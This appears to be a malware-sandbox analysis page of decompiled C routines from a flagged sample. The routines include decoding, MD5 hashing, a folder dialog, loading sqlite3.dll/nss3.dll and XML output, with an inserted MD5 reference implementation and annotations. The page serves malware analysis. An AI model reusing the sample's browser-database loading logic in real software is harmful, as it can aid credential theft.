                                                  • Opcode ID: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
                                                  • Instruction ID: ad5e67b725479cd3c0fe98911646f79d6f4c04cefe3616236e53ea043d5b2769
                                                  • Opcode Fuzzy Hash: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
                                                  • Instruction Fuzzy Hash: 24414B75900304AFCB10DFA9C580A9ABBF5FB48308F1084BEEC05AB392D7399A51CB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00410E8A(char* __eax, void* __edi) {
                                                  				unsigned int _v5;
                                                  				signed int _v6;
                                                  				signed int _v7;
                                                  				intOrPtr _v12;
                                                  				intOrPtr _v16;
                                                  				/* temporaries below are used in the body but were left undeclared by the decompiler output */
                                                  				char* _t5;
                                                  				char* _t6;
                                                  				char* _t9;
                                                  				void* _t25;
                                                  				void* _t31;
                                                  				void* _t34;
                                                  				intOrPtr _t37;
                                                  				char _t39;
                                                  				char _t41;
                                                  				char _t43;
                                                  				char _t45;
                                                  				char* _t56;
                                                  				signed char _t57;
                                                  				char* _t67;
                                                  				void* _t68;
                                                  				void* _t69;
                                                  
                                                  				_t68 = __edi;
                                                  				_t56 = __eax;
                                                  				_t69 = 0;
                                                  				_t37 = strlen(__eax) + 0xfffffffd;
                                                  				_v16 = _t37;
                                                  				if(_t37 < 0) {
                                                  					L18:
                                                  					 *((char*)(_t69 + _t68)) = 0;
                                                  					return _t69;
                                                  				}
                                                  				_v12 = 0xfffffffe;
                                                  				_v12 = _v12 - _t56;
                                                  				_t5 = _t56 + 2; // 0x411004
                                                  				_t67 = _t5;
                                                  				while(1) {
                                                  					_t6 = _t67 - 2; // 0x75fff88b
                                                  					_t39 =  *_t6;
                                                  					if( *_t6 != 0x2e) {
                                                  						_v6 = E00410E56(_t39);
                                                  					} else {
                                                  						_v6 = 0x3e;
                                                  					}
                                                  					_t9 = _t67 - 1; // 0xfc75fff8
                                                  					_t41 =  *_t9;
                                                  					if( *_t9 != 0x2e) {
                                                  						_v5 = E00410E56(_t41);
                                                  					} else {
                                                  						_v5 = 0x3e;
                                                  					}
                                                  					_t43 =  *_t67;
                                                  					if( *_t67 != 0x2e) {
                                                  						_t57 = E00410E56(_t43);
                                                  					} else {
                                                  						_t57 = 0x3e;
                                                  					}
                                                  					_t45 =  *((intOrPtr*)(_t67 + 1));
                                                  					if( *((intOrPtr*)(_t67 + 1)) != 0x2e) {
                                                  						_v7 = E00410E56(_t45);
                                                  					} else {
                                                  						_v7 = 0x3e;
                                                  					}
                                                  					 *(_t68 + _t69) = _v5 >> 0x00000004 | _v6 << 0x00000002;
                                                  					if( *_t67 == 0x2d) {
                                                  						break;
                                                  					}
                                                  					 *(_t69 + _t68 + 1) = _t57 >> 0x00000002 | _v5 << 0x00000004;
                                                  					if( *((char*)(_t67 + 1)) == 0x2d) {
                                                  						 *((char*)(_t69 + _t68 + 2)) = 0;
                                                  						_t34 = _t69 + 2; // 0x2
                                                  						return _t34;
                                                  					}
                                                  					_t69 = _t69 + 3;
                                                  					 *(_t69 + _t68 - 1) = _t57 << 0x00000006 | _v7;
                                                  					_t25 = _t69 + 5; // 0x2
                                                  					_t67 = _t67 + 4;
                                                  					if(_t25 >= 0x3ff || _v12 + _t67 > _v16) {
                                                  						goto L18;
                                                  					} else {
                                                  						continue;
                                                  					}
                                                  				}
                                                  				 *(_t69 + _t68 + 1) = 0;
                                                  				_t31 = _t69 + 1; // 0x1
                                                  				return _t31;
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: strlen
                                                  • String ID: >$>$>
                                                  • API String ID: 39653677-3911187716
                                                  • Opcode ID: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
                                                  • Instruction ID: 69dee6f6c2e5f632f5f5b053a668a00b89048f502478ac4f4f3cd81ce8891ac8
                                                  • Opcode Fuzzy Hash: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
                                                  • Instruction Fuzzy Hash: D331D5318097C49ED7218B6980563EFFFA14F26304F188ADAD0E557343D2EC96CAC75A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 50%
                                                  			E0040BC6D(signed int __eax, void* __ecx, void* _a4) {
                                                  				unsigned int _t23;
                                                  				signed int _t25;
                                                  				unsigned int _t34;
                                                  				unsigned int _t36;
                                                  				void* _t40;
                                                  				unsigned int _t45;
                                                  				void* _t46;
                                                  				int _t47;
                                                  				void* _t48;
                                                  				void* _t50;
                                                  
                                                  				_t48 = __ecx;
                                                  				_t34 = __eax;
                                                  				_t23 =  *(__ecx + 0x10);
                                                  				_t36 = _t23 + __eax * 8;
                                                  				 *(__ecx + 0x10) = _t36;
                                                  				if(_t36 < _t23) {
                                                  					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + 1;
                                                  				}
                                                  				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t48 + 0x14)) + (_t34 >> 0x1d);
                                                  				_t25 = _t23 >> 0x00000003 & 0x0000003f;
                                                  				if(_t25 == 0) {
                                                  					L6:
                                                  					if(_t34 >= 0x40) {
                                                  						_t45 = _t34 >> 6;
                                                  						do {
                                                  							memcpy(_t48 + 0x18, _a4, 0x40);
                                                  							_t50 = _t50 + 0xc;
                                                  							E0040BD8A(_t48 + 0x18, _t48);
                                                  							_a4 = _a4 + 0x40;
                                                  							_t34 = _t34 - 0x40;
                                                  							_t45 = _t45 - 1;
                                                  						} while (_t45 != 0);
                                                  					}
                                                  					_push(_t34);
                                                  					_push(_a4);
                                                  					_push(_t48 + 0x18);
                                                  				} else {
                                                  					_t46 = 0x40;
                                                  					_t47 = _t46 - _t25;
                                                  					_t40 = _t48 + 0x18 + _t25;
                                                  					if(_t34 >= _t47) {
                                                  						memcpy(_t40, _a4, _t47);
                                                  						_t50 = _t50 + 0xc;
                                                  						E0040BD8A(_t48 + 0x18, _t48);
                                                  						_a4 = _a4 + _t47;
                                                  						_t34 = _t34 - _t47;
                                                  						goto L6;
                                                  					} else {
                                                  						_push(_t34);
                                                  						_push(_a4);
                                                  						_push(_t40);
                                                  					}
                                                  				}
                                                  				return memcpy();
                                                  			}













                                                  0x0040bc72
                                                  0x0040bc74
                                                  0x0040bc76
                                                  0x0040bc79
                                                  0x0040bc7f
                                                  0x0040bc82
                                                  0x0040bc84
                                                  0x0040bc84
                                                  0x0040bc8c
                                                  0x0040bc92
                                                  0x0040bc95
                                                  0x0040bcc7
                                                  0x0040bcca
                                                  0x0040bcce
                                                  0x0040bcd1
                                                  0x0040bcda
                                                  0x0040bcdf
                                                  0x0040bce7
                                                  0x0040bcec
                                                  0x0040bcf0
                                                  0x0040bcf3
                                                  0x0040bcf3
                                                  0x0040bcd1
                                                  0x0040bcf6
                                                  0x0040bcf7
                                                  0x0040bcfd
                                                  0x0040bc97
                                                  0x0040bc99
                                                  0x0040bc9a
                                                  0x0040bc9e
                                                  0x0040bca2
                                                  0x0040bcb0
                                                  0x0040bcb5
                                                  0x0040bcbd
                                                  0x0040bcc2
                                                  0x0040bcc5
                                                  0x00000000
                                                  0x0040bca4
                                                  0x0040bca4
                                                  0x0040bca5
                                                  0x0040bca8
                                                  0x0040bca8
                                                  0x0040bca2
                                                  0x0040bd0a

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: @
                                                  • API String ID: 3510742995-2766056989
                                                  • Opcode ID: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
                                                  • Instruction ID: cecad1072309209c94eeb2778a75b30bbc980c70aaade9bdc77468b7d13379ad
                                                  • Opcode Fuzzy Hash: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
                                                  • Instruction Fuzzy Hash: 8B112BB29003056BDB288F16D8809AA77EAEF50344700063FFD0796291FB39DE55C6DC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
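
Note on E0040BC6D above: the decompiled bookkeeping (a two-dword counter at +0x10/+0x14 incremented by len*8 with carry into the high dword, buffer index = (count >> 3) & 0x3f, 64-byte blocks copied into the context at +0x18 before each call to E0040BD8A) is the RFC 1321 MD5Update control flow, with the context laid out as state[4], count[2], buffer[64]. The following is an added reference implementation written for comparison, not code from the sample or from this report; it assumes the chaining state sits at offset 0 and that E0040BD8A is the block transform, which the page does not show. The hex helper and chunk size parameter are conveniences for exercising the partial-block path.

```c
/* Added example: RFC 1321 MD5 with an Update routine that mirrors the control
 * flow of E0040BC6D. Context layout matches the offsets in the decompilation:
 * state at +0x00 (assumed), count at +0x10/+0x14, buffer at +0x18. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct {
    uint32_t state[4];   /* +0x00: chaining value (assumed from E0040BD8A(buffer, ctx)) */
    uint32_t count[2];   /* +0x10, +0x14: message length in bits, low dword first */
    uint8_t  buffer[64]; /* +0x18: pending partial block */
} md5_ctx;

static const uint32_t K[64] = {
    0xd76aa478,0xe8c7b756,0x242070db,0xc1bdceee,0xf57c0faf,0x4787c62a,0xa8304613,0xfd469501,
    0x698098d8,0x8b44f7af,0xffff5bb1,0x895cd7be,0x6b901122,0xfd987193,0xa679438e,0x49b40821,
    0xf61e2562,0xc040b340,0x265e5a51,0xe9b6c7aa,0xd62f105d,0x02441453,0xd8a1e681,0xe7d3fbc8,
    0x21e1cde6,0xc33707d6,0xf4d50d87,0x455a14ed,0xa9e3e905,0xfcefa3f8,0x676f02d9,0x8d2a4c8a,
    0xfffa3942,0x8771f681,0x6d9d6122,0xfde5380c,0xa4beea44,0x4bdecfa9,0xf6bb4b60,0xbebfbc70,
    0x289b7ec6,0xeaa127fa,0xd4ef3085,0x04881d05,0xd9d4d039,0xe6db99e5,0x1fa27cf8,0xc4ac5665,
    0xf4292244,0x432aff97,0xab9423a7,0xfc93a039,0x655b59c3,0x8f0ccc92,0xffeff47d,0x85845dd1,
    0x6fa87e4f,0xfe2ce6e0,0xa3014314,0x4e0811a1,0xf7537e82,0xbd3af235,0x2ad7d2bb,0xeb86d391 };
static const uint8_t S[64] = {
    7,12,17,22,7,12,17,22,7,12,17,22,7,12,17,22, 5,9,14,20,5,9,14,20,5,9,14,20,5,9,14,20,
    4,11,16,23,4,11,16,23,4,11,16,23,4,11,16,23, 6,10,15,21,6,10,15,21,6,10,15,21,6,10,15,21 };

#define ROTL32(x, n) (((x) << (n)) | ((x) >> (32 - (n))))

/* Block transform: the role E0040BD8A would play if the routine is MD5. */
static void md5_transform(uint32_t st[4], const uint8_t blk[64])
{
    uint32_t M[16], a = st[0], b = st[1], c = st[2], d = st[3];
    for (int i = 0; i < 16; i++)
        M[i] = (uint32_t)blk[4*i] | (uint32_t)blk[4*i+1] << 8 |
               (uint32_t)blk[4*i+2] << 16 | (uint32_t)blk[4*i+3] << 24;
    for (int i = 0; i < 64; i++) {
        uint32_t f, g;
        if      (i < 16) { f = (b & c) | (~b & d); g = i; }
        else if (i < 32) { f = (d & b) | (~d & c); g = (5*i + 1) & 15; }
        else if (i < 48) { f = b ^ c ^ d;          g = (3*i + 5) & 15; }
        else             { f = c ^ (b | ~d);       g = (7*i) & 15; }
        uint32_t t = d; d = c; c = b;
        b = b + ROTL32(a + f + K[i] + M[g], S[i]);
        a = t;
    }
    st[0] += a; st[1] += b; st[2] += c; st[3] += d;
}

void md5_init(md5_ctx *c)
{
    memset(c, 0, sizeof *c);
    c->state[0] = 0x67452301; c->state[1] = 0xefcdab89;
    c->state[2] = 0x98badcfe; c->state[3] = 0x10325476;
}

/* Same control flow as E0040BC6D: counter update with carry, finish a pending
 * partial block, stage whole blocks through the buffer, keep the remainder. */
void md5_update(md5_ctx *c, const uint8_t *in, uint32_t len)
{
    uint32_t old = c->count[0];
    c->count[0] = old + (len << 3);          /* *(ctx+0x10) += len*8 ...          */
    if (c->count[0] < old) c->count[1]++;    /* ... carry into *(ctx+0x14)        */
    c->count[1] += len >> 29;                /* high bits of len*8                */
    uint32_t index = (old >> 3) & 0x3f;      /* bytes already in the buffer       */
    if (index != 0) {
        uint32_t part = 64 - index;
        if (len < part) { memcpy(c->buffer + index, in, len); return; }
        memcpy(c->buffer + index, in, part); /* complete the pending block        */
        md5_transform(c->state, c->buffer);
        in += part; len -= part;
    }
    while (len >= 64) {                      /* len >> 6 full blocks              */
        memcpy(c->buffer, in, 64);
        md5_transform(c->state, c->buffer);
        in += 64; len -= 64;
    }
    memcpy(c->buffer, in, len);              /* trailing bytes start a new block  */
}

void md5_final(md5_ctx *c, uint8_t out[16])
{
    uint8_t bits[8];
    for (int i = 0; i < 8; i++) bits[i] = (uint8_t)(c->count[i / 4] >> (8 * (i % 4)));
    uint32_t index = (c->count[0] >> 3) & 0x3f;
    uint32_t padlen = index < 56 ? 56 - index : 120 - index;
    static const uint8_t pad[64] = { 0x80 };
    md5_update(c, pad, padlen);
    md5_update(c, bits, 8);
    for (int i = 0; i < 16; i++) out[i] = (uint8_t)(c->state[i / 4] >> (8 * (i % 4)));
}

/* Hash len bytes, fed `chunk` bytes per Update call (0 = all at once), as hex. */
const char *md5_hex(const uint8_t *data, size_t len, size_t chunk, char out[33])
{
    md5_ctx c; uint8_t d[16];
    md5_init(&c);
    if (chunk == 0) chunk = len ? len : 1;
    for (size_t off = 0; off < len; off += chunk) {
        size_t n = len - off < chunk ? len - off : chunk;
        md5_update(&c, data + off, (uint32_t)n);
    }
    md5_final(&c, d);
    for (int i = 0; i < 16; i++) sprintf(out + 2*i, "%02x", d[i]);
    return out;
}

int main(void)
{
    char h[33];
    const char *msg = "abc";  /* constructed input */
    printf("md5(\"%s\") = %s\n", msg, md5_hex((const uint8_t *)msg, strlen(msg), 0, h));
    return 0;
}
```

Feeding the same input in odd-sized chunks must give the same digest as a single call; that is the branch at `_t25 != 0` in the decompilation (pending bytes in the buffer), and is the first thing to check when deciding whether a recovered routine really is a standard hash rather than a look-alike.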

                                                  C-Code - Quality: 93%
                                                  			E00406F6F(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                                  				signed int _t21;
                                                  				signed int _t23;
                                                  				void* _t24;
                                                  				signed int _t31;
                                                  				void* _t33;
                                                  				void* _t44;
                                                  				signed int _t46;
                                                  				void* _t48;
                                                  				signed int _t51;
                                                  				int _t52;
                                                  				void** _t53;
                                                  				void* _t58;
                                                  
                                                  				_t53 = __esi;
                                                  				_t1 =  &(_t53[1]); // 0x0
                                                  				_t51 =  *_t1;
                                                  				_t21 = 0;
                                                  				if(_t51 <= 0) {
                                                  					L4:
                                                  					_t2 =  &(_t53[2]); // 0x8
                                                  					_t33 =  *_t53;
                                                  					_t23 =  *_t2 + _t51;
                                                  					_t46 = 8;
                                                  					_t53[1] = _t23;
                                                  					_t24 = _t23 * _t46;
                                                  					_push( ~(0 | _t58 > 0x00000000) | _t24);
                                                  					L004115D0();
                                                  					_t10 =  &(_t53[1]); // 0x0
                                                  					 *_t53 = _t24;
                                                  					memset(_t24, 0,  *_t10 << 3);
                                                  					_t52 = _t51 << 3;
                                                  					memcpy( *_t53, _t33, _t52);
                                                  					if(_t33 != 0) {
                                                  						_push(_t33);
                                                  						L004115D6();
                                                  					}
                                                  					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
                                                  					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
                                                  				} else {
                                                  					_t44 =  *__esi;
                                                  					_t48 = _t44;
                                                  					while( *_t48 != 0) {
                                                  						_t21 = _t21 + 1;
                                                  						_t48 = _t48 + 8;
                                                  						_t58 = _t21 - _t51;
                                                  						if(_t58 < 0) {
                                                  							continue;
                                                  						} else {
                                                  							goto L4;
                                                  						}
                                                  						goto L7;
                                                  					}
                                                  					_t31 = _t21 << 3;
                                                  					 *((intOrPtr*)(_t44 + _t31)) = _a4;
                                                  					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
                                                  				}
                                                  				L7:
                                                  				return 1;
                                                  			}















                                                  0x00406f6f
                                                  0x00406f70
                                                  0x00406f70
                                                  0x00406f73
                                                  0x00406f77
                                                  0x00406f8a
                                                  0x00406f8a
                                                  0x00406f8e
                                                  0x00406f90
                                                  0x00406f96
                                                  0x00406f97
                                                  0x00406f9a
                                                  0x00406fa3
                                                  0x00406fa4
                                                  0x00406fa9
                                                  0x00406fb3
                                                  0x00406fb5
                                                  0x00406fba
                                                  0x00406fc1
                                                  0x00406fcb
                                                  0x00406fcd
                                                  0x00406fce
                                                  0x00406fd3
                                                  0x00406fda
                                                  0x00406fe3
                                                  0x00406f79
                                                  0x00406f79
                                                  0x00406f7b
                                                  0x00406f7d
                                                  0x00406f82
                                                  0x00406f83
                                                  0x00406f86
                                                  0x00406f88
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f88
                                                  0x00406ff3
                                                  0x00406ff6
                                                  0x00406fff
                                                  0x00406fff
                                                  0x00406fe8
                                                  0x00406fec

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@??3@memcpymemset
                                                  • String ID:
                                                  • API String ID: 1865533344-0
                                                  • Opcode ID: 51d873ac656c15b7a7b4c95b09edac65cc2407af7c36c5c472b2660f0814b8dc
                                                  • Instruction ID: 30667c860212afb2fcb1bf0ba773cc68d22997902d766bb0abd15f5aaececc89
                                                  • Opcode Fuzzy Hash: 51d873ac656c15b7a7b4c95b09edac65cc2407af7c36c5c472b2660f0814b8dc
                                                  • Instruction Fuzzy Hash: 81118F71204601AFD328DF1DD881A27F7E6FFD8340B21892EE59B87391DA35E841CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 37%
                                                  			E0040EFAE(char* __esi, char _a4, intOrPtr _a8) {
                                                  				void* _v8;
                                                  				char* _v16;
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				intOrPtr _v36;
                                                  				char _v40;
                                                  				char _v304;
                                                  				char* _t18;
                                                  				char* _t22;
                                                  				char* _t23;
                                                  				intOrPtr* _t24;
                                                  				intOrPtr* _t26;
                                                  				intOrPtr _t30;
                                                  				void* _t35;
                                                  				char* _t36;
                                                  
                                                  				_t18 =  &_v8;
                                                  				_t30 = 0;
                                                  				__imp__SHGetMalloc(_t18);
                                                  				if(_t18 >= 0) {
                                                  					_v40 = _a4;
                                                  					_v28 = _a8;
                                                  					_t22 =  &_v40;
                                                  					_v36 = 0;
                                                  					_v32 = 0;
                                                  					_v24 = 4;
                                                  					_v20 = E0040EF36;
                                                  					_v16 = __esi;
                                                  					__imp__SHBrowseForFolderA(_t22, _t35);
                                                  					_t36 = _t22;
                                                  					if(_t36 != 0) {
                                                  						_t23 =  &_v304;
                                                  						__imp__SHGetPathFromIDListA(_t36, _t23);
                                                  						if(_t23 != 0) {
                                                  							_t30 = 1;
                                                  							strcpy(__esi,  &_v304);
                                                  						}
                                                  						_t24 = _v8;
                                                  						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
                                                  						_t26 = _v8;
                                                  						 *((intOrPtr*)( *_t26 + 8))(_t26);
                                                  					}
                                                  				}
                                                  				return _t30;
                                                  			}




















                                                  0x0040efb8
                                                  0x0040efbc
                                                  0x0040efbe
                                                  0x0040efc6
                                                  0x0040efcb
                                                  0x0040efd1
                                                  0x0040efd5
                                                  0x0040efd9
                                                  0x0040efdc
                                                  0x0040efdf
                                                  0x0040efe6
                                                  0x0040efed
                                                  0x0040eff0
                                                  0x0040eff6
                                                  0x0040effa
                                                  0x0040effc
                                                  0x0040f004
                                                  0x0040f00c
                                                  0x0040f016
                                                  0x0040f017
                                                  0x0040f01d
                                                  0x0040f01e
                                                  0x0040f025
                                                  0x0040f028
                                                  0x0040f02e
                                                  0x0040f02e
                                                  0x0040f031
                                                  0x0040f036

                                                  APIs
                                                  • SHGetMalloc.SHELL32(?), ref: 0040EFBE
                                                  • SHBrowseForFolderA.SHELL32(?), ref: 0040EFF0
                                                  • SHGetPathFromIDListA.SHELL32(00000000,?), ref: 0040F004
                                                  • strcpy.MSVCRT(?,?), ref: 0040F017
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BrowseFolderFromListMallocPathstrcpy
                                                  • String ID:
                                                  • API String ID: 409945605-0
                                                  • Opcode ID: 363e444f0183eb3209581039a296e9ed2a0e0cb40b9c5b89ec9b93d888cfbacc
                                                  • Instruction ID: 0bece651b4572a5d25d0fced66708dfb83f65978f11dfbdadd7c1eadd6bf4f14
                                                  • Opcode Fuzzy Hash: 363e444f0183eb3209581039a296e9ed2a0e0cb40b9c5b89ec9b93d888cfbacc
                                                  • Instruction Fuzzy Hash: DD11F7B5900208AFCB10DFA9D9889EEBBFCFB49310F10447AEA05E7241D779DA458B64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 80%
                                                  			E0040A437(void* __esi) {
                                                  				void* _v260;
                                                  				char _v516;
                                                  				void* __ebx;
                                                  				char* _t16;
                                                  				signed short _t25;
                                                  				signed short _t27;
                                                  				void* _t28;
                                                  
                                                  				_t28 = __esi;
                                                  				_push(E00408647( *((intOrPtr*)(__esi + 0x370))));
                                                  				_t25 = 4;
                                                  				sprintf( &_v260, E004078FF(_t25));
                                                  				_t16 = E00408BDE( *((intOrPtr*)(__esi + 0x370)), 0);
                                                  				if(_t16 > 0) {
                                                  					_push(_t16);
                                                  					_t27 = 5;
                                                  					sprintf( &_v516, E004078FF(_t27));
                                                  					_t16 = strcat( &_v260,  &_v516);
                                                  				}
                                                  				if( *((intOrPtr*)(_t28 + 0x108)) != 0) {
                                                  					return SendMessageA( *(_t28 + 0x114), 0x401, 0,  &_v260);
                                                  				}
                                                  				return _t16;
                                                  			}










                                                  0x0040a437
                                                  0x0040a44c
                                                  0x0040a44f
                                                  0x0040a45d
                                                  0x0040a46d
                                                  0x0040a474
                                                  0x0040a476
                                                  0x0040a479
                                                  0x0040a487
                                                  0x0040a49a
                                                  0x0040a49f
                                                  0x0040a4aa
                                                  0x00000000
                                                  0x0040a4c0
                                                  0x0040a4c7

                                                  APIs
                                                    • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                    • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                  • sprintf.MSVCRT ref: 0040A45D
                                                  • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A4C0
                                                    • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,74B04DE0), ref: 0040797A
                                                    • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                  • sprintf.MSVCRT ref: 0040A487
                                                  • strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: sprintf$LoadMessageSendStringmemcpystrcatstrcpystrlen
                                                  • String ID:
                                                  • API String ID: 919693953-0
                                                  • Opcode ID: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
                                                  • Instruction ID: 75288aada6eb4f7a447a9cf13bdf828529425e42ebb21a5188d22772f738aad9
                                                  • Opcode Fuzzy Hash: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
                                                  • Instruction Fuzzy Hash: 2601DBB250030466D721B775DD86FEB73AC6F00304F40447BB74AF6082DABCE9808B29
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E0040F3BA(char* _a4) {
                                                  				void _v267;
                                                  				char _v268;
                                                  				int _t12;
                                                  				signed int _t16;
                                                  
                                                  				_v268 = 0;
                                                  				memset( &_v267, 0, 0x104);
                                                  				_t12 = strlen(_a4);
                                                  				_t5 = strlen("sqlite3.dll") + 1; // 0x1
                                                  				if(_t12 + _t5 >= 0x104) {
                                                  					_v268 = 0;
                                                  				} else {
                                                  					E004062AD( &_v268, _a4, "sqlite3.dll");
                                                  				}
                                                  				_t16 = E0040614B( &_v268);
                                                  				asm("sbb eax, eax");
                                                  				return  ~( ~_t16);
                                                  			}







                                                  0x0040f3d5
                                                  0x0040f3dc
                                                  0x0040f3e4
                                                  0x0040f3f6
                                                  0x0040f3ff
                                                  0x0040f414
                                                  0x0040f401
                                                  0x0040f40b
                                                  0x0040f411
                                                  0x0040f422
                                                  0x0040f42b
                                                  0x0040f432

                                                  APIs
                                                  • memset.MSVCRT ref: 0040F3DC
                                                  • strlen.MSVCRT ref: 0040F3E4
                                                  • strlen.MSVCRT ref: 0040F3F1
                                                    • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                    • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strlen$memsetstrcatstrcpy
                                                  • String ID: sqlite3.dll
                                                  • API String ID: 1581230619-1155512374
                                                  • Opcode ID: 3cb808dc3fd31d135458d717301fbb3bbf110c950f4aa8e177593d82486e3e62
                                                  • Instruction ID: fec7c4afce47c381fe657df57b8ff367c384fd882de8837a2d08c6e6e293e1f2
                                                  • Opcode Fuzzy Hash: 3cb808dc3fd31d135458d717301fbb3bbf110c950f4aa8e177593d82486e3e62
                                                  • Instruction Fuzzy Hash: 4BF02D3144C1286ADB10E769DC45FCA7BAC8FA1318F1040B7F586E60D2D9B89AC98668
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004098F4(intOrPtr* __ecx, intOrPtr _a4) {
                                                  				void _v259;
                                                  				char _v260;
                                                  				void _v515;
                                                  				char _v516;
                                                  				void* __esi;
                                                  				void* _t15;
                                                  				intOrPtr* _t24;
                                                  				char* _t26;
                                                  
				_t24 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				_t15 =  *((intOrPtr*)( *_t24 + 0x20))(); // virtual call through the object's vtable (slot 0x20)
				_t26 =  &_v260;
				E00409018(_t26, _t15); // strcpy + _strlwr: lower-cased name, see the subcall APIs below
				sprintf( &_v516, "</%s>\r\n", _t26); // format the closing tag line
				return E00405EFD(_a4,  &_v516); // strlen + WriteFile of that line, see the subcall APIs below
                                                  			}

                                                  APIs
                                                  • memset.MSVCRT ref: 00409917
                                                  • memset.MSVCRT ref: 0040992D
                                                    • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                    • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                  • sprintf.MSVCRT ref: 00409957
                                                    • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                    • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,74B04DE0,00000000,?,?,004092ED,00000001,00412B1C,74B04DE0), ref: 00405F17
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                  • String ID: </%s>
                                                  • API String ID: 3202206310-259020660
                                                  • Opcode ID: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
                                                  • Instruction ID: adbfc7571eef3522ba50f6b4148bdf50dea618c8f0168b60c77ad4ff43fabaf4
                                                  • Opcode Fuzzy Hash: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
                                                  • Instruction Fuzzy Hash: B201D1729001297AD720A719CC45FDA7AACAF84304F0400FAB60AF3182DA749F848BA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00406734(char* __edi, char* _a4) {
                                                  				char* _t12;
                                                  				int _t13;
                                                  
				_t12 = __edi;
				_t13 = strlen(__edi);
				// Append _a4 only when the combined length still fits a MAX_PATH (0x104) buffer;
				// otherwise __edi is returned unchanged.
